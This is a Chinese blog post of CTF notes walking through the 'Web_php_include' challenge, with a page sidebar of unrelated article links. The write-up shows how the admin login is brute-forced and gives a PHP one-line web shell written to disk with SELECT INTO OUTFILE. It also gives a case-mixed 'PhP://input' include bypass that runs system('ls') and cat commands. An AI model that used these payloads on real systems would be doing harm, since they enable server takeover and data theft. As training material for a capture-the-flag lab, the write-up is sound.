CTF做题笔记3

已于 2022-01-27 15:24:46 修改
阅读量2.6k 收藏
点赞数 1
分类专栏: 笔记 文章标签: 前端 安全 web安全
于 2021-12-10 19:26:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Forever_Han13/article/details/121863381
版权

第四题:Web_php_include

题目:暂无
解答:启动场景,获得信息

请添加图片描述

第一种方法:运用unsican扫描后台目录

请添加图片描述

找到管理员登录页面

请添加图片描述

运用BurpSuite进行爆破

请添加图片描述

发现用户名:root 密码:空 响应时间不同

请添加图片描述请添加图片描述

成功登录管理员页面

请添加图片描述

上传一句话木马:
SELECT "<?php eval(@$_POST['root']); ?>"
INTO OUTFILE '/tmp/shell.php'
利用AntSword连接

请添加图片描述

获取flag

请添加图片描述

第二种方法:分析show_source()函数,发现可以通过大小写绕过

请添加图片描述

利用BurpSuite抓包进行POST传值发送查看指令
?page=PhP://input
 <?php system('ls '); ?>

请添加图片描述

发现flag文件
?page=PhP://input
 <?php system('cat  fl4gisisish3r3.php '); ?>

请添加图片描述

N1etzsche
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
C语言中的system有什么作用,C语言中system函数的使用
weixin_39992199的博客
05-16 3945
System()是c语言中为了调用windows系统命令来设置的,它包含在头文件#include中,具体的使用可以在system("help");后发现帮助命令,命令如下:有关某个命令的详细信息,请键入 HELP 命令名ASSOC 显示或修改文件扩展名关联。ATTRIB 显示或更改文件属性。BREAK 设置或清除扩展式 CTRL+C 检查。BCD...
CTF入门web篇17命令执行相关函数及绕过技巧讲解
anquanniu的博客
10-12 2010
命令注入和代码注入区别 之前我们讲过的都是代码注入,注入的代码相当于网页中新的代码,比如去执行数据库读取的操作,我们想办法插入一段代码去执行,这就是代码执行。 命令注入 命令注入执行的是系统中的命令,使目标服务器的命令在目标服务器上去执行我们想要执行的命令,系统命令的执行还是要基于某些函数的调度去实现的。 1、system函数 例如system函数执行系统命令并输出相应的结果: String ...
CTF实践
weixin_51909453的博客
12-15 1127
CTF实践 1.实验目的 实验目的:通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTP web服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用。 系统环境:Kali Linux 2、WebDeveloper靶机来源:https://www.vulnhub.com/ 实验工具:不限 2.实验内容、原理 实验原理: 1、什么是CTF CTF(Capture
WEB渗透Web突破篇-SSRF
qq_59468567的博客
08-03 927
转码服务 在线翻译 获取超链接的标题等内容进行显示 请求远程服务器资源的地方,图片加载与下载(通过URL地址加载或下载图片) 图片、文章收藏功能 对外发起网络请求的地方,网站采集、网页抓取的地方。 头像 (远程加载头像) 一切要你输入网址的地方和可以输入ip的地方。 数据库内置功能(mongodb的copyDatabase函数) 邮件系统 文件处理 在线处理工具 从URL关键字中寻找:share、wap、url、link、src、source、target、u、3g、display、sourceURl、im
html+css+js实现一个简单的电商商城首页
爱敲代码的卡拉米的博客
08-02 323
很多刚入门编程的小白学习了基础语法,却不知道语法的用途,不知道如何加深映像,不知道如何提升自己,这个时候每天刷自主刷一些题就非常重要(百炼成神),可以去牛客网上的编程初学者入门训练。2.💗【👇🏻👇🏻👇🏻关注我| 获取更多源码 | 优质文章】 带您学习各种前端插件、3D炫酷效果、图片展示、文字效果、以及整站模板 、大学生毕业HTML模板 、期末大作业模板 、等!绿泡泡:XiaoMei_NN。
探索WebKit之巅:开启现代网页应用的高效与兼容之旅
weixin_67239318的博客
08-03 483
随着现代网页应用的快速发展,WebKit作为先进的浏览器引擎,其在高效性和兼容性上的表现显得尤为重要。本文深入探讨了WebKit的架构和渲染机制,揭示了其在支持Web标准和提升浏览体验方面的关键技术。通过分析WebKit如何处理DOM操作、JavaScript执行与图形渲染等挑战,我们了解到优化WebKit性能不仅关乎算法和硬件的优化,还涉及网络协议和安全框架的理解。此外,本文讨论如何通过WebKit应对多设备和分辨率下的兼容性问题。掌握这些关键因素,对于开发者来说,是打造高效、兼容的现代网页应用的基础。
高德地图离线版 使用高德地图api的方法
m0_62336925的博客
08-02 573
然因为高德地图的瓦片地图太大,所以要让后端部署下 前端直接调用 如果本地 直接找到瓦片图路径就可以。这个代码把你想用的方法名保存到本地。这个时候会报错 因为没有这个方法。然后就可以正常使用这个方法拉。然后使用他的离线方法。找到对应的名字 复制。
文章相关接口
qq_74474809的博客
08-03 261
跟着黑马程序员学习SpringBoot3+Vue3
小程序支付(前端
weixin_43993121的博客
08-05 264
【代码】小程序支付(前端
Web】TFCCTF 2024 部分题解
uuzeray的博客
08-04 688
但是因为strtok代码本身存在错误,当传入的string末尾为:时,会传入none进token,继而让internal server error,从而重启服务,这样就可以将事先写入app/templates下的模板文件注册。这时候再审计代码,可以发现当/login路由查表成功,会调strtok去分割数据,再写入User返回。提示打SSRF,但限制死了前缀要是http://google.com/修改后,再以admin/123:登录,此时服务会报错,刷新即可重启服务。多了一个/,便不能用@绕过。
vuex知识
qq_16570607的博客
08-04 371
将getMoviesRankingInDouban的action用promise包装一下, 在此次请求结束后, 根据此次请求返回的电影的id, 根据id再次请求电影的信息。数据请求,在action中, 根据传入的参数(数字1-250)异步请求电影数据, 在请求完成后提交mutation。例子:在action中, 根据传入的参数(数字1-250)异步请求电影数据, 在请求完成后提交mutation。状态更改,在mutation中,将查询的结果(传入的参数), 赋值给state中声明的变量。
vue实现PC端图片放大缩小可鼠标拖动,鼠标滚轮控制放大缩小完整代码付效果图
a_靖的博客
08-07 54
vue实现放大缩小,拖动盒子完整代码付效果图
前端Web-JavaScript(下)
Yu2uki的博客
08-03 1431
补全一下js,忘记了好回来看
我们的前端开发逆天了!1 小时搞定了新网站,还跟我说 “不要钱”
努力做最接地气的编程干货分享,感谢关注
07-29 2919
本文将带你了解一个新的 Web 框架 **Astro**,并手把手带你使用 Astro 搭建一个属于自己的站点,用过的都说真香!
WHAT - Table 表格组件实践 - 拖拽列改变宽度 Resizable Column
weixin_58540586的博客
08-06 507
【代码】WHAT - Table 表格组件实践 - 拖拽列改变宽度 Resizable Column。
Vue项目通过宝塔部署之后,页面刷新后浏览器404页面
最新发布
水w的博客
08-07 138
Vue项目通过宝塔部署之后,页面刷新后浏览器404页面
Vue3:【props、emit 和 components】 在 setup 语法糖和非语法糖中的使用
weixin_52268321的博客
08-03 402
Vue3:【props、emit 和 components】 在 setup 语法糖和非语法糖中的使用
【Android】网络技术知识总结之WebView,HttpURLConnection,OKHttp,XML的pull解析方式
Patrick_yuxuan的博客
08-07 583
网络技术知识总结—WebView,HttpURLConnection,OKHttp,XML的pull解析方式
前端跨域bug解决
ngczx的博客
08-02 272
前端跨域解决
ctf garden解题
04-30
CTF Garden是一个在线的CTF(Capture The Flag)平台,提供了各种类型的解题挑战,旨在帮助安全爱好者提升技能和知识。在CTF Garden中,你可以通过解决各种不同难度的题目来学习和实践网络安全相关的技术。 解题...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值